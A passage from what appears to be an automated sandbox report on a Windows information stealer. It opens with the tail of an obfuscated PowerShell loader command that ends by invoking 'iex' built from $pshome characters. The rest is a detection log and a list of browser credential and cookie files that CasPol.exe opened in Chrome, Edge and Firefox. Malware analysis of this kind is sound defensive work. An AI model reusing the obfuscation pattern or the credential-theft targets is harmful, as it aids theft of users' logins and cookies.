b4fdesativadob4f, b4fcaspol'+'b4f, b4fdesativadob4f, b4fdesativadob'+'4f,b4fdesativad'+'ob4f,b4fdesativadob4f,b4fdesativadob4f,b4fdesativadob4f,b4fdesativadob'+'4f,b4f1b4f,b4fdesativadob4f));').replace('b4f',[string][char]39).replace('shn','$').replace('s7g','|') |& ( $pshome[4]+$pshome[30]+'x')"
                    Source: CasPol.exe, 0000000C.00000002.3863782930.0000000000FA9000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Manager
                    Source: CasPol.exe, 0000000C.00000002.3863782930.0000000000FA9000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Managera
                    Source: CasPol.exe, 0000000C.00000002.3863782930.0000000000FA9000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Managern
                    Source: CasPol.exe, 0000000C.00000002.3861630082.0000000000F62000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 0000000C.00000002.3863782930.0000000000FA9000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: |Program Manager|
                    Source: CasPol.exe, 0000000C.00000002.3863782930.0000000000FA9000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Manager<
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 12_2_00433E0A cpuid 12_2_00433E0A
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: GetLocaleInfoA,12_2_0040E679
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: EnumSystemLocalesW,12_2_004470AE
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: GetLocaleInfoW,12_2_004510BA
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,12_2_004511E3
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: GetLocaleInfoW,12_2_004512EA
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,12_2_004513B7
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: GetLocaleInfoW,12_2_00447597
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,12_2_00450A7F
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: EnumSystemLocalesW,12_2_00450CF7
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: EnumSystemLocalesW,12_2_00450D42
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: EnumSystemLocalesW,12_2_00450DDD
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,12_2_00450E6A
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.SecureBoot.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.SecureBoot.Commands.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0012~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-UEV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\UEV\Microsoft.Uev.Commands.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\WindowsErrorReporting\Microsoft.WindowsErrorReporting.PowerShell.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_00404915 GetLocalTime,CreateEventA,CreateThread,12_2_00404915
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_0041A7A2 GetComputerNameExW,GetUserNameW,12_2_0041A7A2
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_0044800F _free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,12_2_0044800F
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 18_2_0041739B GetVersionExW,18_2_0041739B
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                    Stealing of Sensitive Information

                    Source: Yara match | File source: 12.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 12.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 0000000A.00000002.1870823401.0000000005C9A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 0000000C.00000002.3861630082.0000000000F47000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: Process Memory Space: powershell.exe PID: 752, type: MEMORYSTR
                    Source: Yara match | File source: Process Memory Space: CasPol.exe PID: 3276, type: MEMORYSTR
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: \AppData\Local\Google\Chrome\User Data\Default\Login Data | 12_2_0040B21B
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: \AppData\Roaming\Mozilla\Firefox\Profiles\ | 12_2_0040B335
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: \key3.db | 12_2_0040B335
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\cookies.sqlite
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\key4.db
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\places.sqlite
